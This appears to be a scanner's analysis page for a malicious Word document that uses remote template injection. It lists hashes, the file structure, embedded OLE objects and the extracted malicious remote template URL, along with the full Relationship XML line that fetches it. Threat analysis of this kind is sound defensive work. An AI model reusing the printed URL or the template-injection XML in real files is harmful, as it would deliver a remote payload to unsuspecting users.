Malicious
Malicious

6e22990a77f2a1cfbc835871923229a6

MS Word Document
|
MD5: 6e22990a77f2a1cfbc835871923229a6
|
Size: 188.32 KB
|
application/msword

Office Document
Remote Template Injection
T1221
Moderately Suspicious Document

Print
General
Structural Analysis
Config.1
Yara Rules13
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
6e22990a77f2a1cfbc835871923229a6
Sha1
4093f5a078d99cb321aa457b820aa82b6469fe52
Sha256
508d5a64aa5458d84162afa374167c46e778b1a02cef7ce2ed7aa1a3e95ca394
Sha384
f8e606817082fd548652b6eb4c9ab5dbcac08b3acbe523d485a0dbf653dced15bfd8dcb3d42ad6e2a34b1c8893edcf6c
Sha512
f6a9b260fc92d9916d774efb9aaa9edfb9820a774cffe60ead3a8c08546845b9d7fe006cde1e638422781e87846c5bed485464da870ab406e805332a363a4fcc
SSDeep
3072:YZ8AXSrAc3exgqB8ZEIfpscBGe4XwM9wsG9dfAoiBXGkYpOsISDCoeoy:YZ8A03S8r5BltPNd9WtYpORAhy
TLSH
6C04122B7135126EED8522F3E166B73DB22F5C17070B23022AB0B76D69C76D94EA1724
File Structure
6e22990a77f2a1cfbc835871923229a6
Office Document
Remote Template Injection
T1221
Moderately Suspicious Document
Malicious
[Content_Types].xml
Xml
_rels
.rels
Xml
word
Malicious
_rels
Malicious
document.xml.rels
Xml
header2.xml.rels
Xml
footer2.xml.rels
Xml
settings.xml.rels
Xml
Remote Template Injection
T1221
Moderately Suspicious Document
Malicious
document.xml
Xml
footnotes.xml
Xml
footer2.xml
Xml
footer3.xml
Xml
header3.xml
Xml
endnotes.xml
Xml
header2.xml
Xml
media
image1.emf
image2.emf
embeddings
oleObject1.bin
Office Document
Root Entry
Ole
CompObj
ObjInfo
CONTENTS
Text (Preview)
Page #1
PDF Text Preview (generated)
#Stream {23}
#Stream {21}
#Stream {44}
#Stream {42}
#Stream {5}
Structure
oleObject2.bin
Office Document
Root Entry
CONTENTS
Text (Preview)
Page #1
PDF Text Preview (generated)
#Stream {7}
#Stream {9}
Structure
theme
theme1.xml
Xml
settings.xml
Xml
styles.xml
Xml
webSettings.xml
Xml
fontTable.xml
Xml
docProps
app.xml
Xml
core.xml
Xml
Malware Configuration - Remote Template
Config. Field
Value
Target

https://newtotalrecallingwithbestthignswtihentirreturnforbetterperofmancewithmegoodthings.doTX@r.glnint.com/LQHWuXB

Path

settings.xml.rels

XPath

/Relationships/Relationship

Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://newtotalrecallingwithbestthignswtihentirreturnforbetterperofmancewithmegoodthings.doTX@r.glnint.com/LQHWuXB" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />

Informations
Name
Value
CONTENTS

1.2

CONTENTS

1.7

CONTENTS

CONTENTS

D:20240716171736+08'00'

CONTENTS

Microsoft Reporting Services 2019.11.0.0

CONTENTS

CONTENTS

MREIR-GateIn

CONTENTS

Microsoft Reporting Services PDF Rendering Extension 2019.11.0.0

CONTENTS

Microsoft Reporting Services 2019.11.0.0

CONTENTS

Microsoft Reporting Services PDF Rendering Extension 2019.11.0.0

CONTENTS

D:20240716171736+08'00'

Artefacts
Name
Value
Remote Template - Highly Suspicious

https://newtotalrecallingwithbestthignswtihentirreturnforbetterperofmancewithmegoodthings.doTX@r.glnint.com/LQHWuXB

6e22990a77f2a1cfbc835871923229a6 (188.32 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙